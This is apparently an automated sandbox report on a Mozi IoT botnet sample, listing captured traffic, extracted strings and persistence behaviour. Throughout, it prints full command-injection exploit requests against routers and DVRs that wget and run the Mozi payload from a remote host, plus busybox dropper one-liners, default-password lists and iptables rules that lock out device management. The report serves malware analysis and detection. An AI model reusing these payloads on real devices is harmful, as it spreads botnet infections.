                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 34.90.159.216:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 69.195.90.130:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.72.178.146:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 95.217.3.9:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Apr 2021 19:13:31 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/Mozi.m
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/Mozi.m;
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/Mozi.m;$
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/bin.sh
                Source: rIbyGX66OpString found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: rIbyGX66OpString found in binary or memory: http://127.0.0.1
                Source: rIbyGX66OpString found in binary or memory: http://127.0.0.1sendcmd
                Source: rIbyGX66OpString found in binary or memory: http://HTTP/1.1
                Source: rIbyGX66OpString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.8.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: rIbyGX66OpString found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: rIbyGX66OpString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: rIbyGX66OpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: rIbyGX66OpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: rIbyGX66OpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca/upload.php
                Source: /tmp/rIbyGX66Op (PID: 4578)HTML file containing JavaScript created: /usr/networksJump to dropped file
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                Source: Initial sampleString containing potential weak password found: admin
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: 123456
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: 12345
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial samplePotential command found: POST /cdn-cgi/
                Source: Initial samplePotential command found: GET /c HTTP/1.0
                Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
                Source: Initial samplePotential command found: GET %s HTTP/1.1
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
                Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
                Source: Initial samplePotential command found: mount -o remount,rw /overlay /
                Source: Initial samplePotential command found: mv -f %s %s
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: GET /c
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: killall -9 %s
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
                Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
                Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                Source: Initial samplePotential command found: GET /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
                Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
                Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: rIbyGX66Op, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: classification engineClassification label: mal100.spre.troj.evad.lin@0/221@4/0

                Persistence and Installation Behavior:

                barindex
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4616)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4650)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4653)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4690)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
                Source: /bin/sh (PID: 4716)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4739)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4748)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
                Source: /bin/sh (PID: 4793)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4796)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4805)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4829)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4878)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4906)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 4926)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 4931)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 4947)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 4974)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5000)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5021)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5025)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5034)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5057)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5087)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5117)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5120)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5127)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5152)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
                Source: /bin/sh (PID: 5182)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5210)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5231)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
                Source: /bin/sh (PID: 5234)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
                Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /proc/4578/mountsJump to behavior
                Sample tries to persist itself using /etc/profileShow sources
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/profile.d/apps-bin-path.shJump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/profile.d/Z97-byobu.shJump to behavior
                Source: /tmp/rIbyGX66Op (PID: 4578)File: /etc/profile.d/bash_completion.shJump to behavior
